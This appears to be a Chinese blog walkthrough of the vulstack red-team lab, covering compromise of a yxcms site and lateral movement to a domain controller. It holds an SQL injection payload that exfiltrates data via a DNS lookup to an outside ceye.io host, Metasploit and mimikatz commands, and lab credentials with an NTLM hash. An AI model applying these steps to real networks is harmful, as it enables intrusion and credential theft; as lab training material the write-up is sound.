[内网渗透]vulstack红队评估(一)

简介: 根据作者公开的靶机信息整理:虚拟机初始所有统一密码:hongrisec@2019 因为登陆前要修改密码,改为了panda666...

一、环境搭建:

1、根据作者公开的靶机信息整理:

虚拟机初始所有统一密码:hongrisec@2019

 

因为登陆前要修改密码,改为了panda666...

 

2、虚拟网卡网络配置:

①Win7双网卡模拟内外网:

外网:192.168.1.43,桥接模式与物理机相通

内网:192.168.52.143

 

还需要修改以下网络配置,将网段设置好

 

②Win2003只有内网:

内网:192.168.52.138,仅主机模式

 

③Win2008只有内网:

内网:192.168.52.141,仅主机模式

 

④攻击机:

kali:192.168.1.2

win10:192.168.1.7

 

然后启动Phpstudy即可开启web服务

 

 

二、Web层渗透:

1、信息收集:

①服务和端口

 

访问80端口的http服务,发现php探针,收集一些有用的信息:

绝对路径:C:/phpStudy/WWW

 

②目录扫描

发现phpmyadmin、beifen.rar文件

 

访问phpmyadmin页面,手动试了常见的弱口令,root/root进去了

 

查看是否可以intoutfile直接写入一句话,但secure_file_priv为NULL所以不能指定写入的路径,先放一下,看看备份文件有什么可利用的


SHOW VARIABLES LIKE '%secure%'


 

访问文件路径,把备份文件下载

 

发现是yxcms的源码备份文件

 

并且通过升级日志,知道版本为1.2.1

 

 

2、漏洞挖掘:

①存储型XSS:

留言板处,输入xss payload,点击留言:

 

②信息泄露+弱口令进后台:

 

访问后台地址,输入默认账号密码:admin/123456,查看留言是,发现刚才的xss payload执行了,get√ N0.1

 

③任意文件写入漏洞:

前台模板-->管理模板文件

 

点击新建

 

直接写入一句话木马,然后保存

 

根据备份文件,找到模板文件的存放路径

 

访问文件,成功getshell

 

④delete注入:

勾选删除碎片时,用burp抓包

 

加入单引号发现会报错

 

网上找的payload,具体就不进行测试了:


and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\abc'))),1,1))--

 

 

⑤还可以通过phpmyadmin全局日志getshell,具体方法也很简单,就不演示了

 

 


三、内网渗透

1、win7本机信息收集

已经成功getshell了,使用蚁剑连接,准备进行内网渗透,为了熟悉MSF,所以打算使用MSF进行

①上传木马并执行

成功拿到meterpreter的会话

 

直接利用getsystem提权(因为没有uac限制)

 

②内网信息收集

发现有域环境:god.org,内网ip为192.168.52.143,DNS服务器(一般是域控):192.168.52.138

 

添加路由进行横向移动

 

利用frp搭建socks代理

上传frp客户端及配置文件到目标机器

 

启动服务端

 

这里我利用蚁剑直接执行客户端,因为msf执行有点问题没解决...

 

探测域内存活主机:


run windows/gather/enum_ad_computers

 

域控列表


run windows/gather/enum_domains

 

所有存活主机

 

dump当前机器的所有hash



load mimikatzmsv

 


kerberos

 

信息整理:




域控2008:OWA.god.org 192.168.52.138
域机器2003:root-tvi862ubeh.god.org 192.168.52.141
web服务器win7:192.168.52.143

 

密码hash整理:


Administrator:ntlm:bd692185c355484e973645bd6a8e4505 明文:panda666...

 

 

2、横向移动拿下域控:

①ms08067(注意payload使用bind),成功拿下win2003域机器

 

②利用CobaltStrike的psexec拿下域控

1.将msf的会话派生给CS,然后抓取凭证,利用smb beacon上线域控

 

成功拿下域控beacon

 

2.转储域内所有hash

 

四、总结:

①通过目录扫描得到备份文件,利用yxcms历史漏洞getshell

②利用msf进行常规内网信息收集

③添加路由+frp搭建socks代理进行内网横向移动

④通过ms08-067漏洞拿下03域机器

⑤利用CS的smb beacon成功拿下域控权限

目录
相关文章
|
3月前
|
SQL 安全 网络协议
黑盒渗透测试:揭开未知的安全隐患
【8月更文挑战第31天】
120 0
|
5月前
|
安全 测试技术 网络安全
网络安全中的渗透测试与风险评估:技术深度解析
【7月更文挑战第3天】在网络安全领域,渗透测试和风险评估是两种不可或缺的技术手段。通过模拟黑客的攻击手段来发现系统中的安全漏洞,以及通过系统性的方法来识别和评估潜在的风险和威胁,两者共同为组织提供了全面的网络安全保障。随着技术的不断发展和网络环境的日益复杂,渗透测试和风险评估的重要性将日益凸显。因此,网络安全从业者应不断学习和掌握这两种技术,以应对日益严峻的网络安全挑战。
|
6月前
|
安全 网络安全 数据安全/隐私保护
关于双面恶魔攻击的定义、检测和预防的最佳实践
关于双面恶魔攻击的定义、检测和预防的最佳实践
|
安全 网络协议 网络安全
[ 内网渗透 ] vulstack红队评估(五)
根据作者公开的靶机信息整理
138 0
|
安全 Oracle 网络协议
[内网渗透] vulstack红队评估(二)
根据作者公开的靶机信息整理: 靶场统一登录密码:1qaz@WSX
182 0
|
安全 Ubuntu Shell
vulstack红队评估(四)
根据作者公开的靶机信息整理
194 0
|
Ubuntu 安全 网络协议
vulstack红队评估(三)
一共是5台机器,目标是拿下域控获取flag文件
243 0
|
机器学习/深度学习 人工智能 算法
Nat. Med. | 制定指导原则以报告AI在临床试验中的使用
Nat. Med. | 制定指导原则以报告AI在临床试验中的使用
138 0
Nat. Med. | 制定指导原则以报告AI在临床试验中的使用